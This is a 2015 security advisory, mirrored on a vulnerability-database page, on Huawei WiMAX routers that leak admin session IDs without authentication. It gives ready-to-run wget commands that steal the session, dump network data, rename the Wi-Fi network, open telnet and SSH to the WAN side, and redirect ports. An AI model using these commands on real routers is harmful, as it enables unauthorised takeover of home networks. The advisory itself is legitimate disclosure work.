Lucene search
K

Huawei Wimax CSRF / Information Disclosure / Manipulation

🗓️ 01 Dec 2015 00:00:00Reported by Pierre KimType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

Huawei Wimax routers vulnerable to multiple threats including unauthenticated information disclosure, admin session cookie hijacking, and CSR

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
  
## Advisory Information  
  
Title: Huawei Wimax routers vulnerable to multiple threats  
Advisory URL: https://pierrekim.github.io/advisories/2015-huawei-0x01.txt  
Blog URL: https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html  
Date published: 2015-12-01  
Vendors contacted: Huawei, CERT.org  
Release mode: Released  
CVE: no current CVE  
CERT Tracking number: VU#406192  
CNNVD: no current CNNVD  
  
  
  
## Product Description  
  
Huawei Technologies Co. Ltd. is a Chinese multinational networking  
and telecommunications equipment and services company.  
It is the largest telecommunications equipment manufacturer in the world.  
  
  
  
## Vulnerabilities Summary  
  
The Huawei BM626e device is a Wimax router / access point overall badly  
designed with a lot of vulnerabilities. The device is provided by  
MTN Cote d'Ivoire as a "Wibox". It's available in a number of countries to  
provide Internet with a Wimax network.  
  
The tests below are done using the last available firmware  
(firmware V100R001CIVC24B010).  
  
Note: This firmware is being used by other Huawei Wimax CPEs and  
Huawei confirmed that the devices below are vulnerable to the same threats:  
  
- EchoLife BM626e WiMAX CPE  
- EchoLife BM626 WiMAX CPE  
- EchoLife BM635 WiMAX CPE  
- EchoLife BM632 WiMAX CPE  
- EchoLife BM631a WiMAX CPE  
- EchoLife BM632w WiMAX CPE  
- EchoLife BM652 WiMAX CPE  
  
The routers are still on sale and used in several countries. They are  
used, at least, in these countries:  
  
- MTN CI (Cote d'Ivoire)  
- Iran Cell (Iran)  
- Irak Telecom (Irak)  
- Libyamax (Libya)  
- Globe Telecom (Philippines)  
- Zain Bahrain (Bahrain)  
- FreshTel (Ukraine)  
  
  
  
## Details - unauthenticated information disclosure  
  
By default, the webpage http://192.168.1.1/check.html contains  
important information  
(wimax configuration, network configuration, wifi and sip  
configuration ...) and is reachable without authentication.  
  
A JavaScript redirection will annoy the attacker (/login.html) and can  
be easily defeated by using wget:  
  
root@kali:~# wget http://192.168.1.1/check.html; less check.html  
  
  
  
## Details - Admin session cookie hijacking  
  
If an admin is currently managing the device (OR used the device but  
didn't properly disconnect),  
the current/used session can be stolen by an attacker located in the  
LAN (or WAN if the HTTP is open in the WAN interface).  
  
The admin session id ("SID") can be recovered in multiple webpages  
without authentication:  
  
- http://192.168.1.1/wimax/security.html  
- http://192.168.1.1/static/deviceinfo.html  
- ...  
  
The security.html webpage contains a valid session ID, without  
authentication, within the JavaScript sources:  
  
sid="SID24188"  
  
  
A "protection" is written in JavaScript and will redirect the attacker  
to the login webpage  
but the Javascript contains the session of the admin (sid="SIDXXXXX")  
so the attacker can retrieve it easily using wget:  
  
root@kali:~# wget http://192.168.1.1/wimax/security.html ; less security.html  
root@kali:~# wget http://192.168.1.1/static/deviceinfo.html ; less  
deviceinfo.html  
  
Note that, by visiting the webpages, the attacker will also disconnect  
the administrator from the Control Panel (http://192.168.1.1/)  
  
  
  
## Details - Information disclosure and CSRF using the stolen admin session ID  
  
By using the previously stolen SID, it is possible to perform  
administration tasks without having proper credentials:  
  
- editing the WLAN configuration,  
- editing the WAN configuation,  
- editing the LAN configuration,  
- opening HTTP/HTTPS/TELNET/SSH in the LAN and WAN interfaces,  
- changing DMZ configurations,  
- editing PortMapping,  
- editing Porttrigger,  
- editing SIP configuration,  
- uploading a custom firmware,  
- ...  
  
  
o Retrieve private information (network information):  
  
  
root@kali:~# wget -qO-  
'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'  
Saving to: `STDOUT'  
  
stats={};do{stats.dhcplist="44:8A:5B:AA:AA:AA,192.168.1.3,71:52:02@00:E0:4C:AA:AA:AA,192.168.1.2,71:52:02";  
stats.reth="  
eth0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA  
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1  
RX packets:27 errors:0 dropped:0 overruns:0 frame:0  
TX packets:109 errors:0 dropped:0 overruns:0 carrier:0  
collisions:0 txqueuelen:1000  
RX bytes:2887 (2.8 KiB) TX bytes:46809 (45.7 KiB)  
Interrupt:9 Base address:0x4000  
eth1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA  
UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:  
RX packets:0 errors:0 dropped:0 overruns:0 frame:0  
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0  
collisions:0 txqueuelen:1000  
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)  
Interrupt:9 Base address:0x4000  
eth2 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA  
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1  
RX packets:2530 errors:0 dropped:0 overruns:0 frame:0  
TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0  
collisions:0 txqueuelen:1000  
RX bytes:351557 (343.3 KiB) TX bytes:536669 (524.0 KiB)  
Interrupt:9 Base address:0x4000  
eth3 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA  
UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1  
RX packets:0 errors:0 dropped:0 overruns:0 frame:0  
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0  
collisions:0 txqueuelen:1000  
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)  
Interrupt:9 Base address:0x4000  
";stats.wlaninfo="  
wl0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA  
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1  
RX packets:5257 errors:0 dropped:0 overruns:0 frame:0  
TX packets:846 errors:0 dropped:0 overruns:0 carrier:0  
collisions:0 txqueuelen:1000  
RX bytes:1117126 (1.0 MiB) TX bytes:279600 (273.0 KiB)  
wl1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA  
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1  
RX packets:0 errors:0 dropped:0 overruns:0 frame:0  
[...]  
  
root@kali:~#  
  
  
  
o Retrieve private information:  
  
An other JSX webpage:  
http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0  
  
root@kali:~# wget -qO-  
'http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0'  
stats={};do{stats.PPPoEStatus='Disconnected';  
stats.GREStatus='Disconnected';stats.wpsmode="7";stats.position="Idle,Idle,"}while(0);  
  
It's possible to get a lot of information by abusing JSX webpages.  
Listing the JSX webpages is left as an exercise for the reader.  
  
  
  
  
The Session ID can be used to change parameters in the Wimax router too:  
  
o Editing the WLAN configuration:  
  
This request will change the first SSID name to 'powned' (you need to  
edit the WWW_SID, by the one provided in the /wimax/security.html  
webpage):  
  
root@kali:~# wget --no-cookies --header "Cookie:  
LoginTimes=0:LoginOverTime=0; FirstMenu=User_1; SecondMenu=User_1_1;  
ThirdMenu=User_1_1_1"  
--post-data='WWW_SID=SID24188&REDIRECT=wlan.html&SERVICE=wifi&SLEEP=2&WLAN_WifiEnable=1&Wlan_chkbox=0&WLAN_WirelessMode=9&WLAN_Channel=0&WLAN_SSID1=powned&WLAN_HideSSID=0%3B0%3B&WLAN_AuthMode=WPAPSKWPA2PSK%3BWPAPSKWPA2PSK%3B&WLAN_EncrypType=TKIPAES%3BTKIPAES%3B&WLAN_COUNTRY_REGION=1&WLAN_Country_Code=1d&WLAN_TXPOWER_NOR=13&WLAN_MAXNUM_STA=16%3B16%3B&WLAN_FragThreshold=2346&WLAN_BeaconPeriod=100&WLAN_RTSThreshold=2347&WLAN_BssidNum=2&WLAN_WscConfMode=7&WLAN_WscAction=3&WLAN_CountryCode=CI&WLAN_WscPinCode=&WLAN_TXRATE=0&WLAN_HTBW=0&WLAN_NTH_SSID=1&WLAN_PinFlag=2'  
http://192.168.1.1/basic/mtk.cgi  
  
  
o Opening the management interface:  
  
This request will open HTTP/HTTPS/TELNET/SSH in the LAN AND the WAN  
interfaces (you need to edit the WWW_SID, by the one provided in the  
/wimax/security.html webpage):  
  
root@kali:~# wget --no-cookies --header "Cookie:  
LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;  
ThirdMenu=User_2_1_0"  
--post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TELNETD_PORT=23&SSHD_PORT=22'  
http://192.168.1.1/basic/mtk.cgi  
  
(The legit administrator can check the changes here:  
http://192.168.1.1/advanced/acl.html)  
  
  
o Changing "DMZ action" - redirecting WAN ports to a target client  
located in the LAN (you need to edit the WWW_SID, by the one provided  
in the /wimax/security.html webpage):  
  
root@kali:~# wget --no-cookies --header "Cookie:  
LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;  
ThirdMenu=User_2_1_0"  
--post-data='WWW_SID=SID24188&REDIRECT=dmz.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_HOST=192.168.1.2&NETFILTER_DMZ_ENABLE=1&DMZInterface=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&DMZHostIPAddress=192.168.1.2&DMZEnable=on&TriggerPort=&TriggerPortEnd='  
http://192.168.1.1/advanced/user.cgi  
  
(The legit administrator can check the changes here:  
http://192.168.1.1/advanced/dmz.html)  
  
  
Other actions are possible and are left as an exercise for the reader:  
  
- Editing PortMapping  
- Editing Porttrigger  
- Editing Sip configuration  
- Uploading a custom firmware  
- ...  
  
  
  
## Vendor Response  
  
The vulnerable routers are in the End Of Service cycle and will not be  
supported anymore.  
  
The vendor encourages its clients to discard existing unsupported models  
and to use new routers.  
  
  
  
## Report Timeline  
  
* Jul 01, 2015: Vulnerabilities found by Pierre Kim.  
* Oct 28, 2015: Huawei PSIRT is notified of the vulnerabilities.  
* Oct 28, 2015: Huawei PSIRT confirms the notification.  
* Nov 03, 2015: Huawei PSIRT is unable to reproduce the  
vulnerabilities ("We cannot open the following web pages without  
authentication")  
* Nov 03, 2015: Pierre Kim informs Huawei to desactivate JavaScript  
and gives Huawei a complete scenario with Linux commands. Pierre Kim  
asks their firmware version.  
* Nov 04, 2015: Pierre Kim asks Huawei about potential difficulties  
with the provided scenario.  
* Nov 05, 2015: Huawei PSIRT says that they are currently working on  
the firmware version issue and will notify in due course.  
* Nov 09, 2015: Huawei PSIRT confirms the vulnerabilities affecting  
EchoLife BM626e WiMAX CPE. "All the versions of this product are  
vulnerable".  
* Nov 09, 2015: Pierre Kim asks about 8 other Wimax models which are  
likely to be vulnerable too (using the same firmware) and asks about  
if security patches will be distributed or the devices are EoL.  
* Nov 11, 2015: Huawei PSIRT notifies the investigation of 8 other  
Wimax models is in progress.  
* Nov 18, 2015: Huawei PSIRT confirms 6 models are affected (EchoLife  
BM626 WiMAX CPE, EchoLife BM635 WiMAX CPE, EchoLife BM632 WiMAX CPE,  
EchoLife BM631a WiMAX CPE, EchoLife BM632w WiMAX CPE, EchoLife BM652  
WiMAX CPE). The routers are in the End Of Service cycle and Huawei  
would not support these models or provide fixed version or patch.  
* Nov 18, 2015: Huawei PSIRT asks to be notified when the advisory is posted.  
* Nov 19, 2015: Pierre Kim contacts CERT.org about the vulnerabilities.  
* Nov 23, 2015: Cert.org assigns VU#406192.  
* Nov 30, 2015: Pierre Kim indicates to Huawei PSIRT that he will  
release the advisory the December 1, 2015.  
* Dec 01, 2015: A public advisory is sent to security mailing lists.  
  
  
  
## Credit  
  
These vulnerabilities were found by Pierre Kim (@PierreKimSec).  
  
  
  
## References  
  
https://pierrekim.github.io/advisories/2015-huawei-0x01.txt  
https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html  
  
  
  
## Disclaimer  
  
This advisory is licensed under a Creative Commons Attribution Non-Commercial  
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJWXNdIAAoJEMQ+Dtp9ky283EYP/3zajG5D6hGNLZhM8teHhnIb  
VMw2XL2uOhUp5KkqqaO9jG3O/4DvuZi+bxS6555+ji9T/79ns9moW6sPN3iWTFRK  
kOgtwxizUvxAS8Br69Q7T3SkWapg7zhJqFkWYtK5WXLgzE2ZYgV8nhI+xwg1R5Or  
QSmRzuhpkMULzrlJFrsS6eizivFjSRe3gSFuXTtKxeTM6xL7iT3k3zFSIg3/JuDO  
xHM3UZnSEJYxIEJOZthWARxQ3TYHIlmRxDbSY6OgVOmH5CgXzttA8wXMyXcAOopR  
KQMFbcEel4Tauaeo8oF797oor0NeG7/kSkvm/8exQYtVES3ySJ9kGIw+Ju53IPBf  
NQh+OcUCe8lIbZgUsaRG3vkcau7FuV520wje2/MaQTefgRlHt3qeylzyc+/F5u75  
u/ks3qP05PK+behrb8TDcljC3i8cjykwjRLjIFnLMIQLUWHVvgHFjI81HWu7cIF8  
jGiqcXTGvYXyDOd7I9kJvwFCUPIPKC7ylIXvhWb57zTqUdbmoxXFywpuOgliPBYH  
ttZLmNF9DDSCN10u8P1Wvcf6I1s1w1hry4jr7VM9+dAVno8UDYCtXS9ordNOzV76  
PWBXfaCqhO7RC2XDwrmrDT3bSbZFZSDMImgNySrldRFbpGkCZkQdke1/HbWPdMpZ  
bs33I5DxAkYV3bUmEf0v  
=lmCK  
-----END PGP SIGNATURE-----  
--   
Pierre Kim  
[email protected]  
@PierreKimSec  
https://pierrekim.github.io/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation